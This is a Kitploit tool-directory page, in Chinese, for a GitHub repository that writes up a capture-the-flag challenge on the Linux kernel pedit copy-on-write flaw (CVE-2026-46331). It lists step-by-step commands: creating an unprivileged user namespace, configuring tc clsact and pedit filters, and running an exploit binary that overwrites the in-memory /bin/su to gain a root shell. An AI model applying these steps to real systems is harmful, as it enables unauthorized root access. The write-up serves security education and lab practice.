Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-46331-pedit-cow — 关于pedit COW漏洞(CVE-2026-46331)的详解与利用步骤 | Kitploit
工具/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
权限提升漏洞利用CTF学习与教育二进制利用
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

关于pedit COW漏洞(CVE-2026-46331)的详解与利用步骤

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-46331-pedit-cow

针对 pedit COW 漏洞(CVE-2026-46331)的撰写和利用步骤。

概述

该挑战演示了 pedit COW,这是 Linux 内核流量控制子系统中数据包编辑动作(act_pedit)的一个缺陷。该漏洞允许非特权用户覆盖内存中 setuid-root 二进制的副本,从而在不触及磁盘文件的情况下有效获取 root shell。

利用步骤

1. 初始设置

环境以非特权用户(karen)身份启动。

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme

2. 权限提升(命名空间创建)

配置流量控制通常需要 CAP_NET_ADMIN 特权,普通用户不具备此权限。我利用非特权用户命名空间来获得该能力。

root@kitploit:~
unshare -r -n

3. 配置流量控制动作

在命名空间内部,我配置了 clsact qdisc,并应用了一个过滤器以触发 pedit 动作。

如有需要,先清理现有配置

root@kitploit:~
tc qdisc del dev lo clsact

设置 qdisc 和过滤器

root@kitploit:~
tc qdisc add dev lo clsact
root@kitploit:~
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64

4. 执行漏洞利用

设置环境后,我退出了 root shell,并以非特权用户身份执行漏洞利用程序。

root@kitploit:~
exit
./packet_edit_meme

5. 最终结果

该漏洞利用成功覆盖了 /bin/su 的条目,提供了一个交互式 root shell。

root@kitploit:~
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

下载工具